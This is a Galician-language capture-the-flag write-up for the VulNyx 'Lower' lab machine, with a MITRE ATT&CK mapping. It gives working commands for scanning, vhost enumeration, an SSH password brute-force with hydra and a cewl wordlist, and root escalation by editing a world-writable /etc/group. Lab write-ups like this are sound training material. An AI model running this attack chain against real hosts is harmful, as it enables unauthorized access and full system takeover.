Doc vulnyx lower
Máquina virtual Lower
A máquina Lower é moi interesante porque...
- Virtual host enumeration con gobuster
- Diccionario personalizado con cewl desde o contido da web
- /etc/group world-writable permite engadir usuarios a grupos
- Escalada mediante manipulación de membresía de grupos (grupo sudo)
Diagrama de ataque
Fase 1 — Recopilación
sudo arp-scan --interface=eth1 192.168.56.0/24
ping -c2 IP_VulNyx_Lower -R # TTL ≃ 64 ⇒ GNU/Linux, TTL ≃ 128 ⇒ Microsoft Windows
sudo nmap -sS -Pn -T4 -p- -vvv --min-rate 5000 IP_VulNyx_Lower # 22,80
whatweb IP_VulNyx_Lower
curl -I IP_VulNyx_Lower
Fase 2 — Análise
# Análise da resposta HTTP
curl -I http://IP_VulNyx_Lower
# Location: www.unique.nyx
# Adición de entrada en /etc/hosts
echo "IP_VulNyx_Lower unique.nyx www.unique.nyx" | sudo tee -a /etc/hosts
# Enumeración de subdominios con gobuster
gobuster vhost -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u 'http://unique.nyx' --append-domain
# Subdominio descuberto: tech.unique.nyx
# Adición de subdominio en /etc/hosts
echo "IP_VulNyx_Lower tech.unique.nyx" | sudo tee -a /etc/hosts
# Análise da web tech.unique.nyx
firefox http://tech.unique.nyx &
# Sección TEAM: usuarios identificados → [usuario1], [usuario2], [usuario3]
# Creación de diccionario con cewl
cewl http://tech.unique.nyx -w dictionary.txt --with-numbers
Fase 3 — Explotación
# Creación de lista de usuarios
cat > users.txt << EOF
[usuario1]
[usuario2]
[usuario3]
EOF
# Ataque de forza bruta SSH
hydra -L users.txt -P dictionary.txt ssh://IP_VulNyx_Lower -F -V -t 64
# Contrasinal atopada para un deses usuarios
# Acceso SSH
ssh [user]@IP_VulNyx_Lower
# ⇒ Conseguimos consola de usuario lancer (flag user.txt)
Fase 4 — Post‑explotación
# Verificación de permisos de /etc/group
ls -l /etc/group
# -rw-r--rw- 1 root root ... /etc/group
# ⇒ /etc/group é world-writable
# Modificación de /etc/group para engadir lancer ao grupo sudo
nano /etc/group
# Modificamos a liña:
# sudo:x:27:[user]
# Saímos e volvemos a entrar por SSH
exit
ssh lancer@IP_VulNyx_Lower
# Verificación de membresía no grupo sudo
id
# Confirmamos que lancer pertence ao grupo sudo
# Verificación de permisos sudo
sudo -l
# (ALL : ALL) ALL
# Cambio a usuario root
sudo su -
# ⇒ Conseguimos consola de root
# Verificación
whoami # root
cat /home/lancer/user.txt && cat /root/root.txt
# ⇒ Flags conseguidas
Correspondencia de fases → MITRE ATT&CK — VulNyx: Lower
| Fase | Acción / Resumo | Vector principal | MITRE ATT&CK (IDs) | CWE(s) (relevantes) |
|---|---|---|---|---|
| 1. Recopilación | Descubrimento de host e servizos expostos | Scanning / descubrimento de servizos | T1595 — Active Scanning T1046 — Network Service Discovery |
CWE-200 — Information Exposure (reconnaissance) |
| 2. Análise | Descubrimento de virtual hosts mediante gobuster | Subdomain enumeration | T1590.002 — Gather Victim Network Information: DNS T1592 — Gather Victim Host Information |
CWE-200 — Information Exposure |
| Xeración de diccionario personalizado con cewl | Password dictionary generation | T1589 — Gather Victim Identity Information T1594 — Search Victim-Owned Websites |
CWE-200 — Information Exposure | |
| 3. Explotación | Ataque de forza bruta SSH con diccionario personalizado | Brute-force con diccionario específico | T1110.001 — Brute Force: Password Guessing T1021.004 — Remote Services: SSH |
CWE-521 — Weak Password Requirements; CWE-307 — Improper Restriction of Excessive Authentication Attempts |
| 4. Post-explotación | Descubrimento de /etc/group con permisos world-writable | Privilege escalation vector discovery | T1083 — File and Directory Discovery T1068 — Exploitation for Privilege Escalation |
CWE-732 — Incorrect Permission Assignment for Critical Resource |
| Modificación de /etc/group para engadir usuario ao grupo sudo | Group membership manipulation | T1098 — Account Manipulation T1136 — Create Account |
CWE-732 — Incorrect Permission Assignment; CWE-269 — Improper Privilege Management | |
| Uso de sudo para obter shell de root | Privilege escalation | T1548.003 — Abuse Elevation Control Mechanism: Sudo and Sudo Caching T1078.003 — Valid Accounts: Local Accounts |
CWE-269 — Improper Privilege Management |